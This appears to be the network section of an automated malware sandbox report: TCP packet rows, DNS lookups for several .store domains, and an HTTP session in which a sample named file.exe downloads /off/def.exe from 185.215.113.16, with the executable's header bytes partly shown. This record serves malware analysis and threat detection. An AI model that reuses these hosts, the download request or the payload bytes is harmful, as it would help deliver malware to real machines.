Oct 29, 2024 06:59:26.973026991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973042965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973047972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.973061085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973072052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.973082066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973097086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.973099947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.973177910 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978543043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978558064 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978574991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978620052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978678942 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978694916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978709936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978725910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978730917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978744030 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978751898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978768110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978775978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978789091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978800058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978805065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978822947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978823900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978833914 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978838921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978854895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978873968 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978883028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978899956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978913069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978934050 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978936911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978951931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978961945 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.978967905 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978984118 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.978990078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979001045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979022026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979037046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979037046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979055882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979059935 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979079962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979095936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979110956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979115009 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979127884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979142904 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979175091 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979216099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979231119 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979245901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979262114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979265928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979278088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979295015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979300022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979319096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979331970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979345083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979362011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979376078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979387999 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979392052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979407072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979414940 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979424953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979448080 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979466915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979480982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979490995 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979495049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979511976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979516983 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979530096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979546070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979552031 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979562998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979578972 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.979578972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.979617119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980329990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980345011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980360031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980374098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980376959 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980391026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980406046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980422974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980428934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980444908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980457067 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980460882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980479002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980490923 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980495930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980511904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980518103 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980528116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980555058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980556011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980571032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980586052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980592012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980602026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980618000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980633020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980640888 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980648041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980653048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980664968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980679989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980689049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.980716944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.980724096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.985359907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.990789890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990828991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990843058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.990858078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990884066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990902901 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.990910053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990947008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990973949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.990984917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991010904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991036892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991060972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991080046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991086006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991111994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991137981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991148949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991178036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991178989 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991204977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991242886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991246939 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991271019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991296053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991317034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991338015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991364956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991389990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991390944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991415977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991425037 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991517067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991556883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991559029 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991597891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991624117 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991638899 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991692066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991719007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991758108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991760969 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991782904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991806030 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991811991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991836071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991861105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991890907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991893053 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991893053 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991918087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991942883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.991960049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.991981030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992007017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992022991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992033958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992058992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992086887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992098093 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992113113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992151022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992151976 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992177010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992189884 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992216110 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992240906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992266893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992280960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992291927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992302895 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992322922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992347002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992372036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992386103 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992397070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992407084 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992424965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992451906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992471933 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992477894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992505074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992558956 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992575884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992603064 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992618084 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992628098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992654085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992676973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992681026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992719889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992727041 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992774010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992799044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992815971 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992825985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992851019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992876053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992887974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992902994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992911100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.992950916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992976904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.992991924 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993002892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993026972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993052006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993065119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993077040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993086100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993103027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993129015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993140936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993154049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993180037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993197918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993206024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993231058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993257999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993271112 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993283033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993298054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.993309975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.993473053 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:27.041760921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:27.042665005 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:28.483335018 CET	49769	80	192.168.2.6	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 06:59:08.539300919 CET	50721	53	192.168.2.6	1.1.1.1
Oct 29, 2024 06:59:08.549205065 CET	53	50721	1.1.1.1	192.168.2.6
Oct 29, 2024 06:59:08.573889971 CET	55525	53	192.168.2.6	1.1.1.1
Oct 29, 2024 06:59:08.583344936 CET	53	55525	1.1.1.1	192.168.2.6
Oct 29, 2024 06:59:08.585495949 CET	52458	53	192.168.2.6	1.1.1.1
Oct 29, 2024 06:59:08.595026016 CET	53	52458	1.1.1.1	192.168.2.6
Oct 29, 2024 06:59:08.596385956 CET	59023	53	192.168.2.6	1.1.1.1
Oct 29, 2024 06:59:08.606228113 CET	53	59023	1.1.1.1	192.168.2.6
Oct 29, 2024 06:59:08.607937098 CET	55418	53	192.168.2.6	1.1.1.1
Oct 29, 2024 06:59:08.619729996 CET	53	55418	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 06:59:08.539300919 CET	192.168.2.6	1.1.1.1	0xbafa	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.573889971 CET	192.168.2.6	1.1.1.1	0x4ca4	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.585495949 CET	192.168.2.6	1.1.1.1	0xeb9c	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.596385956 CET	192.168.2.6	1.1.1.1	0x33be	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.607937098 CET	192.168.2.6	1.1.1.1	0x4d36	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 06:59:08.549205065 CET	1.1.1.1	192.168.2.6	0xbafa	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.583344936 CET	1.1.1.1	192.168.2.6	0x4ca4	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.595026016 CET	1.1.1.1	192.168.2.6	0xeb9c	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.606228113 CET	1.1.1.1	192.168.2.6	0x33be	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.619729996 CET	1.1.1.1	192.168.2.6	0x4d36	No error (0)	necklacedmny.store		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 29, 2024 06:59:08.619729996 CET	1.1.1.1	192.168.2.6	0x4d36	No error (0)	necklacedmny.store		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

necklacedmny.store

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49769	185.215.113.16	80	2748	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 06:59:23.015075922 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Oct 29, 2024 06:59:23.935600042 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 29 Oct 2024 05:59:23 GMT Content-Type: application/octet-stream Content-Length: 2792448 Last-Modified: Tue, 29 Oct 2024 05:55:51 GMT Connection: keep-alive ETag: "672078e7-2a9c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 38 09 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+8+`Ui` @ @.rsrc`2@.idata 8@lzzfrkam@<:@epgvtoot v@.taggant@+"z*@
Oct 29, 2024 06:59:23.935617924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 29, 2024 06:59:23.935638905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 29, 2024 06:59:23.935713053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 29, 2024 06:59:23.935728073 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 29, 2024 06:59:23.935744047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 29, 2024 06:59:23.935760021 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
